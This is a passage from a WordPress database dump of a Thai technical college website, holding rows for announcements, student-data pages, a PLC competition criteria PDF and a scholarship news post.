src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-05-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4561\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-04-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4560\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-03-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n<img class=\"aligncenter wp-image-4587\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-30-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />', 'ประชาสัมพันธ์-อวท.วท.รย.-', '', 'publish', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-%e0%b8%ad%e0%b8%a7%e0%b8%97-%e0%b8%a7%e0%b8%97-%e0%b8%a3%e0%b8%a2', '', '', '2021-12-18 18:32:32', '2021-12-18 11:32:32', '', 0, 'http://www.technicrayong.ac.th/?page_id=4280', 0, 'page', '', 0),
(4281, 1, '2018-11-08 21:13:19', '2018-11-08 14:13:19', 'ประชาสัมพันธ์', 'ประชาสัมพันธ์-อวท.วท.รย.-', '', 'inherit', 'closed', 'closed', '', '4280-revision-v1', '', '', '2018-11-08 21:13:19', '2018-11-08 14:13:19', '', 4280, 'http://www.technicrayong.ac.th/4280-revision-v1/', 0, 'revision', '', 0),
(4282, 1, '2018-11-08 21:49:58', '2018-11-08 14:49:58', '', 'ประกาศ-อวท-โครงการธรรมะสอนใจ-01', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%98%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%b0%e0%b8%aa', '', '', '2018-11-08 21:49:58', '2018-11-08 14:49:58', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-โครงการธรรมะสอนใจ-01.png', 0, 'attachment', 'image/png', 0),
(4284, 1, '2018-11-08 21:51:06', '2018-11-08 14:51:06', '<img class=\"aligncenter wp-image-4282 size-large\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-โครงการธรรมะสอนใจ-01-1024x345.png\" alt=\"\" width=\"640\" height=\"216\" />', 'ประชาสัมพันธ์-อวท.วท.รย.-', '', 'inherit', 'closed', 'closed', '', '4280-revision-v1', '', '', '2018-11-08 21:51:06', '2018-11-08 14:51:06', '', 4280, 'http://www.technicrayong.ac.th/4280-revision-v1/', 0, 'revision', '', 0),
(4285, 1, '2018-11-08 21:54:23', '2018-11-08 14:54:23', '', 'ประกาศ-อวท-โครงการอบรมการเขียนโปรแกรมเชิงวัตถุ-01', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1%e0%b8%81%e0%b8%b2', '', '', '2018-11-08 21:54:23', '2018-11-08 14:54:23', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-โครงการอบรมการเขียนโปรแกรมเชิงวัตถุ-01.png', 0, 'attachment', 'image/png', 0),
(4286, 1, '2018-11-08 21:54:52', '2018-11-08 14:54:52', '<img class=\"aligncenter wp-image-4282 size-large\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-โครงการธรรมะสอนใจ-01-1024x345.png\" alt=\"\" width=\"640\" height=\"216\" />\r\n\r\n<img class=\"aligncenter wp-image-4285 size-large\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-โครงการอบรมการเขียนโปรแกรมเชิงวัตถุ-01-1024x345.png\" alt=\"\" width=\"640\" height=\"216\" />\r\n\r\n ', 'ประชาสัมพันธ์-อวท.วท.รย.-', '', 'inherit', 'closed', 'closed', '', '4280-revision-v1', '', '', '2018-11-08 21:54:52', '2018-11-08 14:54:52', '', 4280, 'http://www.technicrayong.ac.th/4280-revision-v1/', 0, 'revision', '', 0),
(4287, 1, '2018-11-08 21:56:56', '2018-11-08 14:56:56', '<img class=\"aligncenter wp-image-4285 size-large\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-โครงการอบรมการเขียนโปรแกรมเชิงวัตถุ-01-1024x345.png\" alt=\"\" width=\"640\" height=\"216\" />\r\n\r\n<img class=\"aligncenter wp-image-4282 size-large\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-โครงการธรรมะสอนใจ-01-1024x345.png\" alt=\"\" width=\"640\" height=\"216\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'ประชาสัมพันธ์-อวท.วท.รย.-', '', 'inherit', 'closed', 'closed', '', '4280-revision-v1', '', '', '2018-11-08 21:56:56', '2018-11-08 14:56:56', '', 4280, 'http://www.technicrayong.ac.th/4280-revision-v1/', 0, 'revision', '', 0),
(4288, 1, '2018-11-08 22:07:33', '2018-11-08 15:07:33', '', 'ประกาศ-อวท-2561-โครงการอบรมเชิงวัตถุ-01', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1%e0%b9%80', '', '', '2018-11-08 22:07:33', '2018-11-08 15:07:33', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-โครงการอบรมเชิงวัตถุ-01.png', 0, 'attachment', 'image/png', 0),
(4289, 1, '2018-11-08 22:08:04', '2018-11-08 15:08:04', '<img class=\"aligncenter wp-image-4285 size-large\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-โครงการอบรมการเขียนโปรแกรมเชิงวัตถุ-01-1024x345.png\" alt=\"\" width=\"640\" height=\"216\" />\r\n\r\n<img class=\"aligncenter wp-image-4282 size-large\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-โครงการธรรมะสอนใจ-01-1024x345.png\" alt=\"\" width=\"640\" height=\"216\" />\r\n\r\n<img class=\"aligncenter wp-image-4288 size-large\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-โครงการอบรมเชิงวัตถุ-01-724x1024.png\" alt=\"\" width=\"640\" height=\"905\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประชาสัมพันธ์-อวท.วท.รย.-', '', 'inherit', 'closed', 'closed', '', '4280-revision-v1', '', '', '2018-11-08 22:08:04', '2018-11-08 15:08:04', '', 4280, 'http://www.technicrayong.ac.th/4280-revision-v1/', 0, 'revision', '', 0),
(4290, 1, '2018-11-08 22:12:53', '2018-11-08 15:12:53', '<img class=\"aligncenter wp-image-4285 size-large\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-โครงการอบรมการเขียนโปรแกรมเชิงวัตถุ-01-1024x345.png\" alt=\"\" width=\"640\" height=\"216\" />\r\n\r\n<img class=\"aligncenter wp-image-4282 size-large\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-โครงการธรรมะสอนใจ-01-1024x345.png\" alt=\"\" width=\"640\" height=\"216\" />\r\n\r\n<img class=\"aligncenter wp-image-4288\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-โครงการอบรมเชิงวัตถุ-01-212x300.png\" alt=\"\" width=\"400\" height=\"566\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประชาสัมพันธ์-อวท.วท.รย.-', '', 'inherit', 'closed', 'closed', '', '4280-revision-v1', '', '', '2018-11-08 22:12:53', '2018-11-08 15:12:53', '', 4280, 'http://www.technicrayong.ac.th/4280-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4292, 3, '2018-11-09 12:27:35', '2018-11-09 05:27:35', '<img class=\"aligncenter size-full wp-image-4293\" src=\"/wp-content/uploads/2018/11/9-11-2561-11-52-26.jpg\" alt=\"\" width=\"880\" height=\"538\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-4294\" src=\"/wp-content/uploads/2018/11/9-11-2561-11-56-08.jpg\" alt=\"\" width=\"896\" height=\"383\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-4295\" src=\"/wp-content/uploads/2018/11/9-11-2561-12-24-13.jpg\" alt=\"\" width=\"1098\" height=\"645\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-4296\" src=\"/wp-content/uploads/2018/11/9-11-2561-12-06-29.jpg\" alt=\"\" width=\"929\" height=\"730\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-4297\" src=\"/wp-content/uploads/2018/11/9-11-2561-12-13-04.jpg\" alt=\"\" width=\"827\" height=\"1118\" />\r\n<h2><a href=\"http://www.technicrayong.ac.th/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99-%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9-2\">>>ข้อมูลนักเรียน นักศึกษา</a></h2>\r\n<h2><a href=\"http://www.technicrayong.ac.th/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9C%E0%B8%A5%E0%B8%AA%E0%B8%B1%E0%B8%A1%E0%B8%A4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B9%8C%E0%B8%97%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B8%B2%E0%B8%A3\">>>รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา</a></h2>\r\n<h2 class=\"entry-title\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%95%E0%B8%B4%E0%B8%94%E0%B8%95%E0%B8%B2%E0%B8%A1%E0%B8%9C%E0%B8%A5%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%AA%E0%B8%B2/\">>>รายงานการติดตามผลผู้สำเร็จการศึกษา เข้าสู่ตลาดแรงงาน</a></h2>', 'ข้อมูลนักเรียน นักศึกษา ภาคเรียนที่ 2 ปีการศึกษา 2561', '', 'publish', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9-4', '', '', '2018-11-09 12:27:35', '2018-11-09 05:27:35', '', 0, 'http://www.technicrayong.ac.th/?page_id=4292', 0, 'page', '', 0),
(4293, 3, '2018-11-09 12:23:28', '2018-11-09 05:23:28', '', '9-11-2561 11-52-26', '', 'inherit', 'closed', 'closed', '', '9-11-2561-11-52-26', '', '', '2018-11-09 12:23:28', '2018-11-09 05:23:28', '', 4292, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/9-11-2561-11-52-26.jpg', 0, 'attachment', 'image/jpeg', 0),
(4294, 3, '2018-11-09 12:24:18', '2018-11-09 05:24:18', '', '9-11-2561 11-56-08', '', 'inherit', 'closed', 'closed', '', '9-11-2561-11-56-08', '', '', '2018-11-09 12:24:18', '2018-11-09 05:24:18', '', 4292, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/9-11-2561-11-56-08.jpg', 0, 'attachment', 'image/jpeg', 0),
(4295, 3, '2018-11-09 12:25:00', '2018-11-09 05:25:00', '', '9-11-2561 12-24-13', '', 'inherit', 'closed', 'closed', '', '9-11-2561-12-24-13', '', '', '2018-11-09 12:25:00', '2018-11-09 05:25:00', '', 4292, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/9-11-2561-12-24-13.jpg', 0, 'attachment', 'image/jpeg', 0),
(4296, 3, '2018-11-09 12:25:40', '2018-11-09 05:25:40', '', '9-11-2561 12-06-29', '', 'inherit', 'closed', 'closed', '', '9-11-2561-12-06-29', '', '', '2018-11-09 12:25:40', '2018-11-09 05:25:40', '', 4292, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/9-11-2561-12-06-29.jpg', 0, 'attachment', 'image/jpeg', 0),
(4297, 3, '2018-11-09 12:25:51', '2018-11-09 05:25:51', '', '9-11-2561 12-13-04', '', 'inherit', 'closed', 'closed', '', '9-11-2561-12-13-04', '', '', '2018-11-09 12:25:51', '2018-11-09 05:25:51', '', 4292, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/9-11-2561-12-13-04.jpg', 0, 'attachment', 'image/jpeg', 0),
(4298, 3, '2018-11-09 12:27:35', '2018-11-09 05:27:35', '<img class=\"aligncenter size-full wp-image-4293\" src=\"/wp-content/uploads/2018/11/9-11-2561-11-52-26.jpg\" alt=\"\" width=\"880\" height=\"538\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-4294\" src=\"/wp-content/uploads/2018/11/9-11-2561-11-56-08.jpg\" alt=\"\" width=\"896\" height=\"383\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-4295\" src=\"/wp-content/uploads/2018/11/9-11-2561-12-24-13.jpg\" alt=\"\" width=\"1098\" height=\"645\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-4296\" src=\"/wp-content/uploads/2018/11/9-11-2561-12-06-29.jpg\" alt=\"\" width=\"929\" height=\"730\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-4297\" src=\"/wp-content/uploads/2018/11/9-11-2561-12-13-04.jpg\" alt=\"\" width=\"827\" height=\"1118\" />\r\n<h2><a href=\"http://www.technicrayong.ac.th/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99-%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9-2\">>>ข้อมูลนักเรียน นักศึกษา</a></h2>\r\n<h2><a href=\"http://www.technicrayong.ac.th/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9C%E0%B8%A5%E0%B8%AA%E0%B8%B1%E0%B8%A1%E0%B8%A4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B9%8C%E0%B8%97%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B8%B2%E0%B8%A3\">>>รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา</a></h2>\r\n<h2 class=\"entry-title\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%95%E0%B8%B4%E0%B8%94%E0%B8%95%E0%B8%B2%E0%B8%A1%E0%B8%9C%E0%B8%A5%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%AA%E0%B8%B2/\">>>รายงานการติดตามผลผู้สำเร็จการศึกษา เข้าสู่ตลาดแรงงาน</a></h2>', 'ข้อมูลนักเรียน นักศึกษา ภาคเรียนที่ 2 ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '4292-revision-v1', '', '', '2018-11-09 12:27:35', '2018-11-09 05:27:35', '', 4292, 'http://www.technicrayong.ac.th/4292-revision-v1/', 0, 'revision', '', 0),
(4299, 3, '2018-11-09 12:27:53', '2018-11-09 05:27:53', '<img class=\"aligncenter size-full wp-image-4293\" src=\"/wp-content/uploads/2018/11/9-11-2561-11-52-26.jpg\" alt=\"\" width=\"880\" height=\"538\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-4294\" src=\"/wp-content/uploads/2018/11/9-11-2561-11-56-08.jpg\" alt=\"\" width=\"896\" height=\"383\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-4295\" src=\"/wp-content/uploads/2018/11/9-11-2561-12-24-13.jpg\" alt=\"\" width=\"1098\" height=\"645\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-4296\" src=\"/wp-content/uploads/2018/11/9-11-2561-12-06-29.jpg\" alt=\"\" width=\"929\" height=\"730\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-4297\" src=\"/wp-content/uploads/2018/11/9-11-2561-12-13-04.jpg\" alt=\"\" width=\"827\" height=\"1118\" />\r\n<h2><a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99-%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9-2\">>>ข้อมูลนักเรียน นักศึกษา</a></h2>\r\n<h2><a href=\"/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9C%E0%B8%A5%E0%B8%AA%E0%B8%B1%E0%B8%A1%E0%B8%A4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B9%8C%E0%B8%97%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B8%B2%E0%B8%A3\">>>รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา</a></h2>\r\n<h2 class=\"entry-title\"><a href=\"/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%95%E0%B8%B4%E0%B8%94%E0%B8%95%E0%B8%B2%E0%B8%A1%E0%B8%9C%E0%B8%A5%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%AA%E0%B8%B2/\">>>รายงานการติดตามผลผู้สำเร็จการศึกษา เข้าสู่ตลาดแรงงาน</a></h2>', 'ข้อมูลนักเรียน นักศึกษา ภาคเรียนที่ 2 ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '4292-autosave-v1', '', '', '2018-11-09 12:27:53', '2018-11-09 05:27:53', '', 4292, 'http://www.technicrayong.ac.th/4292-autosave-v1/', 0, 'revision', '', 0),
(4300, 3, '2018-11-09 12:33:28', '2018-11-09 05:33:28', '<h3><a href=\"http://www.technicrayong.ac.th/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99-%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9-4/\"><strong>ข้อมูลนักเรียน นักศึกษา ภาคเรียนที่ 2 ปีการศึกษา 2561</strong></a></h3>\r\n<h3><strong><a href=\"/ข้อมูลนักเรียน-นักศึกษา\">ข้อมูลนักเรียน นักศึกษา ภาคเรียนที่ 1 ปีการศึกษา 2561</a></strong></h3>\r\n<h3></h3>', 'ข้อมูลนักเรียน นักศึกษา ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '3220-revision-v1', '', '', '2018-11-09 12:33:28', '2018-11-09 05:33:28', '', 3220, 'http://www.technicrayong.ac.th/3220-revision-v1/', 0, 'revision', '', 0),
(4301, 3, '2018-11-09 13:00:45', '2018-11-09 06:00:45', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%82%E0%B9%88%E0%B8%87%E0%B8%82%E0%B8%B1%E0%B8%99%E0%B8%97%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%B0-PLC-%E0%B8%A3%E0%B8%B0%E0%B8%94%E0%B8%B1%E0%B8%9A%E0%B8%A0%E0%B8%B2%E0%B8%84-%E0%B8%9E%E0%B8%A3%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%95%E0%B8%A3%E0%B8%A7%E0%B8%88.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'เกณฑ์การแข่งขันทักษะการใช้โปรแกรมควบคุมด้วยโปรแกรมเมเบอลคอนโทรลเลอร์ PLC ระดับภาค', '', 'publish', 'closed', 'open', '', '%e0%b9%80%e0%b8%81%e0%b8%93%e0%b8%91%e0%b9%8c%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%81%e0%b8%82%e0%b9%88%e0%b8%87%e0%b8%82%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%b1%e0%b8%81%e0%b8%a9%e0%b8%b0%e0%b8%81%e0%b8%b2', '', '', '2018-11-09 13:00:45', '2018-11-09 06:00:45', '', 0, 'http://www.technicrayong.ac.th/?p=4301', 251, 'post', '', 0),
(4302, 3, '2018-11-09 13:00:15', '2018-11-09 06:00:15', '', 'การแข่งขันทักษะ PLC ระดับภาค พร้อมตารางตรวจ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%81%e0%b8%82%e0%b9%88%e0%b8%87%e0%b8%82%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%b1%e0%b8%81%e0%b8%a9%e0%b8%b0-plc-%e0%b8%a3%e0%b8%b0%e0%b8%94%e0%b8%b1%e0%b8%9a%e0%b8%a0', '', '', '2018-11-09 13:00:15', '2018-11-09 06:00:15', '', 4301, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/การแข่งขันทักษะ-PLC-ระดับภาค-พร้อมตารางตรวจ.pdf', 0, 'attachment', 'application/pdf', 0),
(4303, 3, '2018-11-09 13:00:45', '2018-11-09 06:00:45', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%82%E0%B9%88%E0%B8%87%E0%B8%82%E0%B8%B1%E0%B8%99%E0%B8%97%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%B0-PLC-%E0%B8%A3%E0%B8%B0%E0%B8%94%E0%B8%B1%E0%B8%9A%E0%B8%A0%E0%B8%B2%E0%B8%84-%E0%B8%9E%E0%B8%A3%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%95%E0%B8%A3%E0%B8%A7%E0%B8%88.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'เกณฑ์การแข่งขันทักษะการใช้โปรแกรมควบคุมด้วยโปรแกรมเมเบอลคอนโทรลเลอร์ PLC ระดับภาค', '', 'inherit', 'closed', 'closed', '', '4301-revision-v1', '', '', '2018-11-09 13:00:45', '2018-11-09 06:00:45', '', 4301, 'http://www.technicrayong.ac.th/4301-revision-v1/', 0, 'revision', '', 0),
(4304, 3, '2018-11-09 13:07:52', '2018-11-09 06:07:52', '<a href=\"https://www.facebook.com/media/set/?set=ms.c.eJxFVNmRxTAI62iH~_~_i~%3BsZ0A8vsLMWAhySSZSDapVKTaX25s3a7agTgihCgYcW5MiGXrZWJltwjuJL24pr~_aIc6vP~_FcafLdLxabflLXz2TqmVDvNPVGF0tO~%3B86rd~%3B~%3B6BV29lne7FPnl2~_Lju4~_svnrLuHqtqee~_~%3BNz~_dv2Z5jztzkVy8vXwSHz8SUsgXwdvAR~%3Bv~_buvefD19dPv0z8G7pxo8vvNS3O~%3Bol~%3Ba8OU4Dx28p5eK~_Jz~%3B~_uvwfXqr2PDTBn7IF~_~%3BFVD38qKOetv7dH1PP149CBl875uWdt6Hn6GPwi9rwywl~_eecD3xS~_~%3BZ6ew7flzatuW4~%3B5LVffi6ln3gyD32T9hnl6~_wXyc~%3BzFgn4986sgn3rqrYB~%3B~%3BMrwK~%3BngL8I8Ov7SOr01cvQV~_D3G3wJ8rLZ~_xv2~_fMK~%3BX4fPb4J5Vn~_G~%3BhTr737~_nvfMhvt19CpHvfXyB~%3B1573t~_0H1v4Mdo~%3BJtvnuzVo8DX4tfH~%3B~%3BJJeB8Ug98ZfCx~%3B8DvV6g8~%3BkMniL~%3Bit12~%3Bw96dNhWihfv6ZoZ~%3BNfYV8ltXz~_VP3fRT8aYOfCvPufiHsF10~%3B1~%3BPz7jvDPhPeffH0T54Y~_41i941jP~_TuK~%3BiHY~%3BHBn7z7WfFejXYfQn9TWXzYl7rvS~_Qfobgvtg~-~-.bps.a.704227686620089&type=1\"><img class=\"aligncenter wp-image-4305 size-full\" src=\"/wp-content/uploads/2018/11/9-11-2561-13-08-26.jpg\" alt=\"\" width=\"461\" height=\"638\" /></a>', 'วันพฤหัสบดีที่ ๘ พฤศจิกายน ๒๕๖๑ คุณนิพัทธ์ ล้ำเลิศลักษณชัย ผู้จัดการฝ่ายผลิต บริษัท เอสซีจี เคมิคอลส์ จำกัด เข้ามอบทุนการศึกษาให้แก่นักศึกษาในโครงการ Excellent Model School รุ่นที่ ๑ และ ๒ จำนวน ๓๘ ทุน ทุนละ ๑๐,๐๐๐ บาท รวมเป็นจำนวนเงินทุนการศึกษาทั้งสิ้น ๓๘๐,๐๐๐ บาท เพื่อเป็นการสนับสนุนการศึกษา ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%a4%e0%b8%ab%e0%b8%b1%e0%b8%aa%e0%b8%9a%e0%b8%94%e0%b8%b5%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%98-%e0%b8%9e%e0%b8%a4%e0%b8%a8%e0%b8%88%e0%b8%b4%e0%b8%81%e0%b8%b2', '', '', '2018-11-09 13:07:52', '2018-11-09 06:07:52', '', 0, 'http://www.technicrayong.ac.th/?p=4304', 250, 'post', '', 0),
(4305, 3, '2018-11-09 13:05:57', '2018-11-09 06:05:57', '', '9-11-2561 13-08-26', '', 'inherit', 'closed', 'closed', '', '9-11-2561-13-08-26', '', '', '2018-11-09 13:05:57', '2018-11-09 06:05:57', '', 4304, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/9-11-2561-13-08-26.jpg', 0, 'attachment', 'image/jpeg', 0),
(4306, 3, '2018-11-09 13:07:16', '2018-11-09 06:07:16', '', '45672259_704227973286727_5247252611714777088_o', '', 'inherit', 'closed', 'closed', '', '45672259_704227973286727_5247252611714777088_o', '', '', '2018-11-09 13:07:16', '2018-11-09 06:07:16', '', 4304, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/45672259_704227973286727_5247252611714777088_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4307, 3, '2018-11-09 13:07:52', '2018-11-09 06:07:52', '<a href=\"https://www.facebook.com/media/set/?set=ms.c.eJxFVNmRxTAI62iH~_~_i~%3BsZ0A8vsLMWAhySSZSDapVKTaX25s3a7agTgihCgYcW5MiGXrZWJltwjuJL24pr~_aIc6vP~_FcafLdLxabflLXz2TqmVDvNPVGF0tO~%3B86rd~%3B~%3B6BV29lne7FPnl2~_Lju4~_svnrLuHqtqee~_~%3BNz~_dv2Z5jztzkVy8vXwSHz8SUsgXwdvAR~%3Bv~_buvefD19dPv0z8G7pxo8vvNS3O~%3Bol~%3Ba8OU4Dx28p5eK~_Jz~%3B~_uvwfXqr2PDTBn7IF~_~%3BFVD38qKOetv7dH1PP149CBl875uWdt6Hn6GPwi9rwywl~_eecD3xS~_~%3BZ6ew7flzatuW4~%3B5LVffi6ln3gyD32T9hnl6~_wXyc~%3BzFgn4986sgn3rqrYB~%3B~%3BMrwK~%3BngL8I8Ov7SOr01cvQV~_D3G3wJ8rLZ~_xv2~_fMK~%3BX4fPb4J5Vn~_G~%3BhTr737~_nvfMhvt19CpHvfXyB~%3B1573t~_0H1v4Mdo~%3BJtvnuzVo8DX4tfH~%3B~%3BJJeB8Ug98ZfCx~%3B8DvV6g8~%3BkMniL~%3Bit12~%3Bw96dNhWihfv6ZoZ~%3BNfYV8ltXz~_VP3fRT8aYOfCvPufiHsF10~%3B1~%3BPz7jvDPhPeffH0T54Y~_41i941jP~_TuK~%3BiHY~%3BHBn7z7WfFejXYfQn9TWXzYl7rvS~_Qfobgvtg~-~-.bps.a.704227686620089&type=1\"><img 